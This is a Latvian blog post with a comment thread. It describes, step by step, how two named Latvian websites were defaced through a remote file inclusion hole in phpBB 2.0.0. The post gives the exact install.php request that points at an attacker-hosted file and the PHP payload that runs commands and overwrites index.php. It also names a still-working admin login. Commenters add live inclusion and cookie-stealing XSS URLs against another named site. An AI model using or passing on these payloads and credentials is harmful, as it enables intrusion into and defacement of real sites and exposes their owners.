Laikam jau vēsture atkārtojas. Šoreiz būs vēl viens stāsts no kādas anonīmas personas, kas pastāstīs par to cik vienkārši parasts interneta lietotājs var *uzlauzt* kādu lapu.
Tika uzlauztas divas lapas parlament.lv – defaced un thesig.spils.lv – defaced kurās tika izmantots viens un tas pats forums. Turpinājumā būs aprakstīts, kā tas viss tika izdarīts.
Nezinu vai tas kādam palīdzēs, bet, tomēr gribētu dot vienu padomu. Jebkuru lapu var uzlauzt un vienīgais līdzeklis kā izsargāties no hakeriem ir atslēgt datoru no tīkla… bet var arī mēģināt mazināt risku un sekot līdzi izmantotās programmatūras jauninājumiem.
Garlaiciibas peec, sveetdienas dienaa seerfoju pa netu, un nejaushiibas
peec uzduuros saitam http://parlament.lv .
Lasot garlaiciigaas foruma zinjas un noskrollejot lapu liidz apakshai..
piepeshi ieraugu svariigo rindinju:
“Powered by phpBB 2.0.0 © 2001 phpBB Group”
Kaa nu neatcereeties, ka kaadu laiku atpakalj rokoties bugtrakaa bija maniiti tieshi shiis versijas caurumi.
Caurums1: administratora tiesiibu ieguushana forumaa.
Caurums2: scriptu exectoshana uz servera.
Process:
Caurums1: Siikaak nestaastiishu.. shaadu infu var dabuut netaa pa 10 min.
Izpilde: login=user1 ; password=user1 . //Savaadi, ka lapas deface jau ir izlabots, tachu shim juuzerim joprojaam ir admina tiesiibas.. Kas pirmais? 😉
Caurums2:
1) http://parlament.lv/install.php?phpbb_root_dir=/
Atbilde: Warning: Failed opening ‘/includes/functions_selects.php’ for inclusion (include_path=’.:/usr/local/lib/php’) in …
2) Izveidojam uz kaada no saviem/sveshiem/bezmaksas serveriem direktoriju includes , kura satur failu functions_selects.php
Sekojoshi: www.server.lv/includes/functions_selects.php
functions_selects.php saturs:
< ?
system(‘pwd’);
?>
3)
http://parlament.lv/install.php?phpbb_root_dir=http://www.someserver.lv/
atbilde apmeeram shaada: /home/parlament/forum
4) Mainam functions_selects.php saturu uz:
< ?
$filename = 'celsh uz index.php';
$somecontent = ""; //jaunaas lapas saturs :-)
$somecontent .= ""; //jaunaas lapas saturs :-)
$somecontent .= ""; //jaunaas lapas saturs :-)
if (!$fp = fopen($filename, 'w+')) {
print "Nevar atveert ($filename)";
exit;
}
// Raksta $somecontent iekshaa
if (!fwrite($fp, $somecontent)) {
print "Nevar rakstiit ieksh ($filename)";
exit;
}
print "Ierakstiiju ($somecontent) failaa ($filename)";
fclose($fp);
} else {
print "$filename nav rakstaams";
}
?>
4) Atkaartojam tresho darbiibu.
Atbildes variants #1 – “Ierakstiiju ($somecontent) failaa ($filename)”;
Atbildes variants #2 – “$filename nav rakstaams”;
Ko dariit ja ir atbildes variants #2, domaajiet pashi.. bet iespeeju ir daudz 🙂
Parlamentaa nostraadaaja variants #1.
By this bug:
http://parlament.lv
http://thesig.spils.lv
P.S. ES NEESMU HAKERIS. Es neesmu arii programmeetaajs. Uzskatu, ka par shitaadaam lietaam zinu loti maz. Tachu labpraat maacos visu jauno, un peec iespeejas censhos izmantot to ko zinu. – iistiem hakeriem luudzu neaplikt to, ko man paluudza uzrakstiit coolynx. Savaadaak shitais netiktu tapis.
P.P.S. Peec manaam domaam, exploitu izmantoshana nav hakera izpausme, bet ir tikai viduveejam interneta juuzerim, iistu hakeru uzraadiitais celsh uz normaalu adrenaliina devu 🙂
Uz redzi.
;))))
No taa teksta vareetu saprast, ka tas cilveeks vispaar ar programmeeshanu nenodarbojas, tachu tas taa nav 😛
Un, kas tur tik paarsteidzosh?
nu patiikami, ko es varu par shito teikt – iistie hakeri ir cilveecinji, kuri prot, ja vajg uzlauzt arii brutaali lauzhot, a taadas lietas kaa augstaak mineetaa tieshaam ir internetaa pilns un par vinjaam arii ir rakstiits daudz – taa nav hakoshana es pat nezinu kaa to iisti lai nosauc – kaukaada caurumu mekleeshana un izmantoshana.
to anonymous: lieta ir sekojosha – tev nav nemaz jaabuut nekaadam briesmiigam programmeetaajam – vienkaarshi lasiit jaaprot – internetaa var atrast visu – arii to kaa izgatavot trotilu maajas apstaakljos nemaz neesot kjimikjim.
Kill all programmers! , lai nemokās!
Jaa… naakamaa lieta pie kuras jaakeraas ir atombumba.
kaads nezin kur dabuut plutonu?
Plutonu var atrast uzreiz aiz neptuuna – virzienaa no saules
varbuut tomeer atombumbai pameeginaat plutoniju?
imho shitas viss tikai krieviski ir ieksh mazafaka.ru
Jaa kiimija nav mana stipraa puse uzreiz var redzeet, kaa internets paliidz.
mazafaka.ru saitu dzirdu pirmo reizi.
btw shitais bags ir nemts no www.securityfocus.com.
Protams ka vinsh ir loti vecs, un ir iespeeja, ka vinsh simtiem vietaas jau ir aprakstiits.
Šādus cilvēciņus, kas bezmērķīgi cūkojas apkārt pa Internetu sauc par script kiddies, jo viņi neko citu īpaši nemāk, kā tikai paņemt jau gatavus exploitus un pēc tam krutoties apkārt, ka viņi ir baigie l33t h4x0rs. Patiesībā Internetā viņi tiek pielīdzināti parastiem lamerim.
TU esi stulbs? Izlasti tekstu, un iipashi apakshaa parakstu.
Ja gribi zinaat, tad vieniigais ko noraada bugtrakos ir:
http://www.somesite.com/forum/install.php?phpbb_root_dir=/
P aareejais ir no manis.
Kaa augshaa raxtiits – es neuzskatu sevi par hakeri, tachu kaa tu tur teici script kiddies ir tie, kas izmantos shito PILNIIGI DETALIZEETO APRAKSTU, kaa es to aprakstiiju.
rubii?
Ir arii taadi cilveeki kaa Jaanis Kaaposts, kas ir kaapostaa dzimushi, pljavaa augushi, un tagad maak visus nolikt liidz ar zemi.
to Benvenuto to anonymous šo te var lasīt arī tepat latviski Latvijā,nav nemaz jāit uz mazagfakām.
Smooch’iņ, tu tik briesmīgi neiespringsti. Man tā nejauši radās aizdomas, ka tu laikam esi viens no tiem skriptu puišeļiem, kuram briesmīgi neiepatikās, ja kāds viņu neuzskata par zupaah4x0r. Es jau nav tāds vienīgais meža bērns no kāpostu laukiem, kurš tā uzskata. Visa IT drošības industrija stāv aiz manis :)) Reāla cieņa rodas pret cilvēkiem, kas paši domā un štuko un exploito, nevis tikai Copy -> Paste un nospiež podziņu Exploit. Tā viš i…
Tiem, kas grib uzbūvēt atombumbu mājas apstākļos iesaku izlasīt šo raxtiņu: Istorija radioaktivnova bojskauta
Kaaposts tiesham no laukiem! a smooch ta vismaz fishku rubii !!
Piemetīšu vēl vienu lapeli kas ir uzlausta ,lai būtu jautrāk apspriest lūk[galīigi svaiga] http://kasparsj.yo.lv un te ir vinja īstā http://kasparsj.yo.lv/old.ht ml</a>
Sveiki.
Sveiki. Viss jau buutu dikti jauki, ja vien buutu kaada jeega no shiis niekoshanaas. Pashlaik taada dizhoshanaas vien skiet. Un veel jo vairaak dizhoshanaas taapec ka cilveki sho sauc par hakerismu un saka “es jau neesmu hakeris” – pag, pag neviens tevi nesauc par hakeri. Redziet, es esmu riktigs iesacejs un kad kaut ko nezinu njemu un palasu gramatinjas internetaa. Taa nu sanaaca vienreiz palasit rakstu gabalu kas ir hakers vai mosh vinsh saucaas kaa kluut par hakeri – jaa jaa tas pats viscaur cirkuleejoshais materiaals – kaadreiz taksh jaaizlasa ir tas ko iesaka ne tikai jaasaka tas ir labs. un taa izlasiiju to gabalu un noskaidroju ka hakeris ir tas kas pats buuvee a tas kas lauzh ir krakeris. Hakeris ir tikai un vieniigi ar plusa ziimi veerteejams elements datorpasaulee. Ja juus ar savu darbiibu kaut ko lauzhat laushanas peec tad labaak nenemiet mutee hakera vaardu. Un vissmiekligais man shitajaa situaacijaa skiet fakts, ka shim te interneta friikam kas izlasiijis par gluku netaa tiek pieversta tada uzmaniiba.
Rekur interesants log fails man te bij saruna – kuraa viss skaidrs: (+[LaT]Sacrosanct_Listniex) es saku:es neesu krakeris (+[LaT]Sacrosanct_Listniex) es vienkaarshi hakeris (Listniex) es saku:es neesu KRAKERIS (Listniex) es vienkaarshi HAKERIS (Listniex) nu vo (Listniex) bet (DoubleD) es reecu par to ka tu esi hakeris (Listniex) kaada ir ranja starp hakeri un krakeri zini? (Listniex) es raxtiiju apr to zinaatnisko darbu un dabuuju 1. vietu valstii (Listniex) un mans diploms ir apskataams ja netici http://81.198.16.140/kernel/pics.php?picture_id=2 gl hakot !
Aa, starp citu es vakar pa raadzhu dzirdeeju, ka Laeims Galahers dabuujis taisnajaa. Palicis par paaris priekshzobiem nabagaaks un par paaris zilumiem biezaaks. Sorry adminam, ka tas viss nav po kjemu. BET fakts ir svariigs un apspriezhams
Man patiik miiklas (DoubleD diploms) Pashlaik esmu tiktaal ka DoubleD maacaas kaut kaadaa gimnaazijaa un vinja vaards ir Krishjanis.
1. gimnazija: Krishjanis Nesenbergs.
da nee nav gan
Buu! Baigo labais koments par plutonu :)))
Tas tak Listniex nevis DoubleD
Moraale – gribi droshu forumu? kodee pac! un veel paluudz dzhekus no #hackers lai notestee 😉
Nevajag braukt ar izteicieniem, ka shitaa raksta izlikshana ir kautkaada dizhoshanaas.
Es nosuutiiju coolynxam tikai .jpg.
Vinsh mani paluudza aprakstiit, un es piekritu.
Rubii?
Pareizi coolynx teica: Kaada jeega no plikiem jpg failiem? (tad nebuutu nekaadas diskusijas). Bet dazhi tomeer nerubii neko!
NEE NEE NEE NAU MANS DIPLOMS.. da es nau vainiigs – es log failu iepostee a tas man te rindas neatdala un edit savu zinju arii nevar – to visu tur tas dzeks stasta.. es tak nezinaaju ka man pasham ar roku shitanii textaree veel jaaliek
! taaka to visu tas eliitais kex tur raxta! man nah nekadu diplomu nau .. nu vienigi dejoshanas :DDDD
Vo, MZM zelta vaardi.
Manupraat labaak, ka POdaa paraadaas shitaada informaacija nekaa shitaada informaacija tur neparaadaas. Var gudri spriest, tachu, sak ko grib, viskaut kas dziivee noder. Plus, nekur nemaniiju nekaadu dizho dizhoshanos. Un, btw, hakeris ir jau kljuvis par miitisku, legjendaaru terminu, kau kas liidziigs alkjimikjim vai burvim, kas iespeej vairaak kaa parasti cilveeki un ir apriikots ar peedeejaa kliedziena paardabiskaam speejaam computer-related area. Phe!
Ai kā es mīlu PHP! Un ar katru dienu jo vairāk!
http://nite.l v/? page=/index
Un nesaki, ka pats esi pasargāts no sveša koda includošanas. Nekad nekad. Varbūt palīdzēs ‘safe mode’?
🙂
ezis2a: laaaaabs 😀
sorry par ļauno prieku, bet salīdziniet taku, kas parādās errormesidžā:
http://hack.nite.lv/index.php?id=666 http://nite.l v/?page=666
PHP ir tik izpalīdzīgs ne tikai programmētājiem, bet arī hakeriem…
P.S. Radio Naba skan labi!
http://nite.lv ir caurumains kaa durshlaks!
http://nite.lv/?page=alert(document.cookie)
Cross site scriptings iet kaa pa sviestu ;]
labs rakstinjsh, forshi komentaari izveersaas
re: http://www.chazzzrock.yo.lv/ tagad esmu stiliigs (ljoti)
p.s. ljoti
Pie ieprieksheejaa komenta maneejaa, truukst un nu re kaada coolynxam filtaacija 🙂
Smooch: filtraacija ir tikai veel nav pietiekami laba. jaaizdomaa kaa, lai cheko urljus + aprauj, ja vajag, bet pashu adresi atstaaj cik taa gara ir un nocheko uz visaam *sliktaam* lietaam. neesmu pie taa visa kjeeries, bet to veel vajag…
Jaa ar laikiem visiem tagad laikam gruuti 🙁
Mjaa.. Nu uzlauza, nu un tad. Ja tā paskatās, tad savu webu es uzturu tikai priekš tam lai dotu cilvēkiem informāciju par visu kas saitīts ar mobīlajiem telefoniem (forums caur kuru uzlauza) un dotu cilveekiem pieeju pie manas programmas “SIEMENS Organiser”. Tapēc lapas drošībai netiek pievērsts sevišķi daudz uzmanības, jau tā pietiekoši darba un pienākumu. Vienīgais ko šādā veidā uzlaužot var panākt t.i. web aizvēršanu (nu nav laika nodarboties vēl ar citu kļudu labošanu, tāda paša iemesla dēļ netiek rakstīts savējais foruma un portāla dzinulis), un tātad automātiski liegt citiem iespēju piekļūt pie informācijas, kura varētu būt viņiem noderīga.